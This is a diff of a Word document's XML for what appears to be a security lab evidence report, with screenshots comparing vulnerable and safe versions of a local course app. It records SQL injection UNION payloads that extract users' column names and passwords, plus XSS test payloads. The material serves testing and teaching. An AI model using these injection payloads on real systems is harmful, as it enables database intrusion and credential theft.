-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Observed database response: AdminPass!26</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:40.811Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/vulnerable/courses?q=%27+UNION+SELECT+username%2Cpassword%2Cemail+FROM+users+--+</w:t>
+        <w:t>Vulnerable Version Sql Injection Advanced Columns</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT 'COLUMN',name,type FROM pragma_table_info('users') -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Observed database response: password</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:08.182Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/vulnerable/courses?q=%27+UNION+SELECT+%27COLUMN%27%2Cname%2Ctype+FROM+pragma_table_info%28%27users%27%29+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4304,8 +4513,8 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="4DD0CD35">
-          <v:shape id="_x0000_i1042" type="#_x0000_t75" style="width:495pt;height:361.5pt">
+        <w:pict w14:anchorId="1ED4202D">
+          <v:shape id="_x0000_i1042" type="#_x0000_t75" style="width:388.5pt;height:395.25pt">
             <v:imagedata r:id="rId21" o:title=""/>
           </v:shape>
         </w:pict>
@@ -4333,7 +4542,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 22 of 41</w:t>
+        <w:t>Page 23 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4369,80 +4578,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Dashboard</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Application dashboard renders.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:41.575Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe</w:t>
+        <w:t>Vulnerable Version Sql Injection Advanced Credentials</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT username,password,email FROM users -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Observed database response: AdminPass!26</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:08.840Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/vulnerable/courses?q=%27+UNION+SELECT+username%2Cpassword%2Cemail+FROM+users+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4467,8 +4699,8 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="5E5D50AE">
-          <v:shape id="_x0000_i1043" type="#_x0000_t75" style="width:495pt;height:344.25pt">
+        <w:pict w14:anchorId="4AE32C59">
+          <v:shape id="_x0000_i1043" type="#_x0000_t75" style="width:495pt;height:361.5pt">
             <v:imagedata r:id="rId22" o:title=""/>
           </v:shape>
         </w:pict>
@@ -4496,7 +4728,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 23 of 41</w:t>
+        <w:t>Page 24 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4532,104 +4764,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Reflected Xss</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Input or attack setup: &lt;svg onload="document.getElementById(`search-summary`).textContent=`REFLECTED XSS EXECUTED`"&gt;&lt;/svg&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Literal payload rendered without execution.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:42.408Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target endpoint: http://localhost:8000/safe/courses. Exact encoded URL is in verification.json.</w:t>
+        <w:t>Vulnerable Version Normal Search</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: Information</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Legitimate course search still returns Information Security.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:09.441Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/vulnerable/courses?q=Information</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4654,7 +4885,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="3CED08AA">
+        <w:pict w14:anchorId="08292F8C">
           <v:shape id="_x0000_i1044" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId23" o:title=""/>
           </v:shape>
@@ -4683,7 +4914,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 24 of 41</w:t>
+        <w:t>Page 25 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4719,104 +4950,79 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Dom Xss</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Input or attack setup: &lt;img src=x onerror="document.getElementById('note-preview').textContent='DOM XSS EXECUTED'"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Fragment rendered through textContent.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:43.206Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target endpoint: http://localhost:8000/safe/planner. Exact encoded URL is in verification.json.</w:t>
+        <w:t>Safe Version Dashboard</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Application dashboard renders.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:10.173Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4841,7 +5047,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="6C723959">
+        <w:pict w14:anchorId="2F11BFD7">
           <v:shape id="_x0000_i1045" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId24" o:title=""/>
           </v:shape>
@@ -4870,7 +5076,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 25 of 41</w:t>
+        <w:t>Page 26 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4906,104 +5112,112 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Stored Xss</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
